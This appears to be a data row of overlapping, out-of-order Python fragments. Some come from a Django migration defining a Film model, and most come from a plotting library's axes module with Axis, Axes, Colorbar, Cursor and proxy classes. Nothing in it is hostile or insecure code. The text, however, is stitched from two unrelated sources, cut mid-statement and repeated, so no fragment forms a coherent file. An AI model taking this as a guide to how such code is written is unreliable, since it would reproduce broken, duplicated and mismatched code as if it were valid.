import settings from django.db", "'Movie'), ('tv_show', 
'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user',", "= [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True,", "('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'),", "('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True,", "dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True,", "settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True", "('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie',", "'7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show'," ]
[ "the axis and way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self,", "self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation: str, position: float, bounds:", "\"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #: y_value = Float() #:", "def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar =", "pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def", "axis and way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound:", "pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str,", "and a way to prevent self recursion # FIXME Add convenience to connect", "to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #:", "axis. limits = List(tuple) #: Label of the axis label = Str() #:", "the axes plots = Dict(str, BasePlot) #: Display a major grid major_grid_enabled =", "@mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported", "def _resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a", "for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to", "def remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\"", "for lab, _ in missing]} do not \" \"exist. 
Existing axes are \"", "not self.proxy: raise RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id])", "matplotlib default) # --- Private API #: Reference to the backend resolver needed", "#: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Should that", "and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not", "_resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\"", "to add more elements #: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize", "used for the label label_font = Dict(str) #: Font used for the tick", "\"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping", "from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy):", "def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line(", "used for {[lab for lab, _ in missing]} do not \" \"exist. 
Existing", "the tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor", ") for pa in axes.values() ): unknown = [] missing = [] for", "# What axis are we linked to pass def remove_cursor(self, index: int): pass", "if missing: raise RuntimeError( f\"The axes used for {[lab for lab, _ in", "set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title:", "super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or", "axes used for {[lab for lab, _ in unknown]} do not \" \"correspond", "from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation: str,", "def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass", "Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the parent axes. 
axes =", "for p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize()", "@mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]):", "right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot if any.", "different figures ie beyond # matplotlib default) # --- Private API #: Reference", "self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis =", "pa in axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa))", "def remove_cursor(self, index: int): pass def add_plot(self, plot) -> None: \"\"\"Add a plot", "def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def", "we linked to pass def remove_cursor(self, index: int): pass def add_plot(self, plot) ->", "pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of", "self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize()", "provide way to draw into the axis and way to manipulate the axis", "top_axis = Typed(Axis) #: Colorbar associated with plot if any. colorbar = Typed(Colorbar)", "# SHOULD NOT be edited in place. legends = Dict(str, str) #: Projection", "#: axes in the axes_set. 
intercept = Float() # FIXME Add connections to", "p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver to be", "pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The", "font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy):", "self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the object and", "set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a", "cursors = ATuple(Cursor) #: Set of plots currently displayed in the axes plots", "disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id):", "setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis with no", "plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already exist in axes {self}\")", "str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]):", "@mark_backend_unsupported def add_cursor( self, axes=None ): # Need to specify to which axes", "return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the figure", "license. 
# # The full license is in the file LICENCE, distributed with", "Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the figure holding", "= Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver):", "{id} does not exist in axes {self.axes},\" f\" known plots are {self.plots}\" )", "\"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values() ):", "List, Str from atom.api import Tuple as ATuple from atom.api import Typed from", "import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle:", "pass def add_plot(self, plot) -> None: \"\"\"Add a plot to the axes.\"\"\" if", "supposed to be used. if any( ( pa not in (\"left\", \"bottom\", \"right\",", "#: Axes composing this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis =", "to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def", "pass def remove_line(self, id: str) -> None: pass # FIXME Need to define", "# FIXME Add convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for", "currently active on the graph cursors = ATuple(Cursor) #: Set of plots currently", "its ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot {id} does not", "in the axes plots = Dict(str, BasePlot) #: Display a major grid major_grid_enabled", "# Validate the axes supposed to be used. if any( ( pa not", "under the terms of the BSD license. # # The full license is", "{[lab for lab, _ in unknown]} do not \" \"correspond to any valid", "# The full license is in the file LICENCE, distributed with this software.", "plot) -> None: \"\"\"Add a plot to the axes.\"\"\" if plot.id in self.plots:", "class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the parent axes. 
axes", "Font used for the tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20)", "the terms of the BSD license. # # The full license is in", "self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver)", "= self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver to be able", "a 2D plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes)", "pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font:", "ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale):", "Need to specify to which axes the cursor is bound pass @mark_backend_unsupported def", "axis with the other axis in data coordinate. #: Setting this values will", "self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis are we", ") if not self.proxy: raise RuntimeError(f\"Axes {self} does not have an active proxy.\")", "Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class", "and their associated proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple", "f\"The axes used for {[lab for lab, _ in unknown]} do not \"", "axes.axes[ax] is not None]}, \" f\"specified axes are {[pa for _, pa in", "AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis is expected to provide", "pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None )", "\"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool,", "= Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling =", "distributed with this software. 
# -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy.", "intercept = Float() # FIXME Add connections to the proxy and a way", "self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def", "position: float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id:", "or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the", "be able to add more elements #: later on. self._resolver = resolver def", "ability to link axes (accross different figures ie beyond # matplotlib default) #", "\"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): #", "to be used. if any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\")", "def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis", "Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for", "limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def", "if self.left_axis else \"right\", } plot.axes_mapping = axes # Validate the axes supposed", "Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List,", "RuntimeError( f\"The axes used for {[lab for lab, _ in unknown]} do not", "no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str,", "-------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. 
\"\"\" from typing import Any,", "valid axes (valid axes are \" \"'left', 'right', 'top', 'bottom', provided axes are", "unknown = [] missing = [] for lab, pa in axes.items(): if pa", "#: Reference to the figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes", "Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot if any. colorbar =", "expected to provide way to draw into the axis and way to manipulate", "connections to the proxy and a way to prevent self recursion # FIXME", "import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to", "a major grid major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled =", "used. if any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self,", "Make sure the plot knows where it is plotted. plot.axes = self self.plots[plot.id]", "not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to", "str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str):", "in self.plots: raise RuntimeError(f\"A plot with {id} already exist in axes {self}\") axes", "colorbar and their associated proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence,", "not None]}, \" f\"specified axes are {[pa for _, pa in missing]}.\" )", "the colorbar should be created. 
location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should", "are we linked to pass def remove_cursor(self, index: int): pass def add_plot(self, plot)", "List(str) #: Font used for the label label_font = Dict(str) #: Font used", "from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api", "labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class", "def set_limits(self, limits): # Limited to axis with no breaks pass @mark_backend_unsupported def", "@mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for", "= Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #:", "not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None:", "def remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\" if id not", "in missing]}.\" ) # Make sure the plot knows where it is plotted.", "axes are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]},", "Tuple[str, str]): # What axis are we linked to pass def remove_cursor(self, index:", "id not in self.plots: raise KeyError( f\"Plot {id} does not exist in axes", "class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the parent axes.", "currently displayed in the axes plots = Dict(str, BasePlot) #: Display a major", "\"\"\"Proxy for axes. As in matplotlib an axis is expected to provide way", "self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name", "-> None: \"\"\"Add a plot to the axes.\"\"\" if plot.id in self.plots: raise", "labels. 
tick_labels = List(str) #: Font used for the label label_font = Dict(str)", "\"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if", "or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self)", "remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\" if id not in", "@mark_backend_unsupported def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]]", "def remove_line(self, id: str) -> None: pass # FIXME Need to define the", "lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self,", "disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self,", "created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be autoscaled", "import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for", "def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self,", "the plot knows where it is plotted. 
plot.axes = self self.plots[plot.id] = plot", "Initialize the plot if we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self,", "class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self,", "None]}, \" f\"specified axes are {[pa for _, pa in missing]}.\" ) #", "colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation:", "The full license is in the file LICENCE, distributed with this software. #", "limits): # Limited to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits):", "proxy def _resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of", "of a plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes)", "no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool):", "based on its ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot {id}", "labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass", "remove_cursor(self, index: int): pass def add_plot(self, plot) -> None: \"\"\"Add a plot to", "\"correspond to any valid axes (valid axes are \" \"'left', 'right', 'top', 'bottom',", "have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the", "disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported", "default) # --- Private API #: Reference to the backend resolver needed to", "def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass 
@mark_backend_unsupported def", "bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def", "plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Should", "add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None,", "self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver)", "None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used for {[lab for", "_ in missing]} do not \" \"exist. Existing axes are \" f\"{[ax for", "of 2 tuple representing a possibly discountinuous axis. limits = List(tuple) #: Label", "lab, _ in unknown]} do not \" \"correspond to any valid axes (valid", "to enable zooming/panning and modifiers # TODO Add the ability to link axes", "a plot based on its ID.\"\"\" if id not in self.plots: raise KeyError(", "pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass", "Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id: str) -> None:", "of plots currently displayed in the axes plots = Dict(str, BasePlot) #: Display", "#: Projection to use on the axes. 
projection = Enum(\"cartesian\", \"polar\") def __init__(self,", "pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy", "What axis are we linked to pass def remove_cursor(self, index: int): pass def", "active on the graph cursors = ATuple(Cursor) #: Set of plots currently displayed", "if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the", "link axes (accross different figures ie beyond # matplotlib default) # --- Private", "@mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need to", "Set of plots currently displayed in the axes plots = Dict(str, BasePlot) #:", "or getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values() ): unknown =", "axes=None ): # Need to specify to which axes the cursor is bound", "# # Distributed under the terms of the BSD license. # # The", "\"\"\"Add a plot to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot", "the file LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and", "a plot\"\"\" #: Reference to the figure holding the axes. figure = ForwardTyped(_resolve_figure)", "resolver to be able to add more elements #: later on. self._resolver =", "self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in", "to which axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported", "def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def", "is in the file LICENCE, distributed with this software. 
# -------------------------------------------------------------------------------------- \"\"\"Axis, axes,", "\"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa for _, pa in", "font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy", "proxy and a way to prevent self recursion # FIXME Add convenience to", "from atom.api import Tuple as ATuple from atom.api import Typed from ..backends.resolver import", "\"\"\"Proxy for a single axis. Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def", "# TODO Add the ability to link axes (accross different figures ie beyond", "else \"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes #", "possibly discountinuous axis. limits = List(tuple) #: Label of the axis label =", "for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin,", "= Bool() #: # SHOULD NOT be edited in place. legends = Dict(str,", "data coordinate. #: Setting this values will have an impact only if there", "self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar", "Add the ability to link axes (accross different figures ie beyond # matplotlib", "pa)) if missing: raise RuntimeError( f\"The axes used for {[lab for lab, _", "--- Private API #: Reference to the backend resolver needed to dynamically add", "the axis label = Str() #: Tick labels. tick_labels = List(str) #: Font", "axes # Validate the axes supposed to be used. if any( ( pa", "are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]}, \"", "None: pass # FIXME Need to define the proper API to enable zooming/panning", "to sync to the proxy def _resolve_figure(): from .figure import Figure return Figure", "in missing]} do not \" \"exist. 
Existing axes are \" f\"{[ax for ax", "= Typed(Axis) #: Colorbar associated with plot if any. colorbar = Typed(Colorbar) #:", "= Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #:", "Should that axis be autoscaled auto_scaling = Bool() #: List of 2 tuple", "CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in", "not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis", "resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p in self.plots.values():", "the figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object.", "\" \"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa for _, pa", "self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name", "in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name", "#: Intercept position of this axis with the other axis in data coordinate.", "in axes.values() ): unknown = [] missing = [] for lab, pa in", "axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes,", "associated with plot if any. colorbar = Typed(Colorbar) #: Set of cursors currently", "Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def", "id): pass @mark_backend_unsupported def add_line( self, id: str, orientation: str, position: float, bounds:", "pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass", "Str() #: Tick labels. 
tick_labels = List(str) #: Font used for the label", "proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple from atom.api import", "in place. legends = Dict(str, str) #: Projection to use on the axes.", "\"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values() ): unknown", "axes in the axes_set. intercept = Float() # FIXME Add connections to the", "f\"{pa}_axis\") is None ) for pa in axes.values() ): unknown = [] missing", "List(tuple) #: Label of the axis label = Str() #: Tick labels. tick_labels", "file LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their", "of this axis with the other axis in data coordinate. #: Setting this", "ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis", "git history for more details. # # Distributed under the terms of the", "in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa", "Setting this values will have an impact only if there are only 2", "resolver): \"\"\"Initialize the proxy of the object and the axes.\"\"\" super().initialize(resolver) for axis", "#: Setting this values will have an impact only if there are only", "self.left_axis else \"right\", } plot.axes_mapping = axes # Validate the axes supposed to", "in axes {self.axes},\" f\" known plots are {self.plots}\" ) if not self.proxy: raise", "full license is in the file LICENCE, distributed with this software. # --------------------------------------------------------------------------------------", "colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self,", "direction inverted. 
inverted = Bool() #: Label of the axis label = Str()", "atom.api import Typed from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy,", "lab, _ in missing]} do not \" \"exist. Existing axes are \" f\"{[ax", "Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the object and the axes.\"\"\"", "in unknown]} do not \" \"correspond to any valid axes (valid axes are", "the BSD license. # # The full license is in the file LICENCE,", "this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. \"\"\" from", "button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported", "set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line(", "\"\"\"Axis, axes, colorbar and their associated proxy. \"\"\" from typing import Any, Mapping,", "a plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #:", "#: Font used for the tick labels tick_labels_font = Dict(str) #: aspect_ratio =", "Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id:", "plot.\"\"\" #: x_value = Float() #: y_value = Float() #: c_value = Float(float(\"nan\"))", "\"top\", \"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling = Bool() #:", "\"right\", } plot.axes_mapping = axes # Validate the axes supposed to be used.", "of a plot\"\"\" #: Reference to the figure holding the axes. 
figure =", "Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot if", "'right', 'top', 'bottom', provided axes are \" f\"{[pa for _, pa in unknown]}).\"", "title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str,", "in axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif", "import Tuple as ATuple from atom.api import Typed from ..backends.resolver import BackendResolver from", "set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need to specify to", "\"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes # Validate the", "self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver to be able to", "#: y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME need to sync", "Typed(Colorbar) #: Set of cursors currently active on the graph cursors = ATuple(Cursor)", "\"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling = Bool() #: List", "Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the", "with plot if any. colorbar = Typed(Colorbar) #: Set of cursors currently active", "axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self,", "position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\"", "def add_cursor(self, axes: Tuple[str, str]): # What axis are we linked to pass", "# -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. 
\"\"\" from typing import", "axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name =", "\"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self)", "@mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str,", "import Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum, Float,", "on a plot.\"\"\" #: x_value = Float() #: y_value = Float() #: c_value", "#: Set of cursors currently active on the graph cursors = ATuple(Cursor) #:", "@mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def", "log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits):", "plot knows where it is plotted. plot.axes = self self.plots[plot.id] = plot #", "pa in axes.values() ): unknown = [] missing = [] for lab, pa", 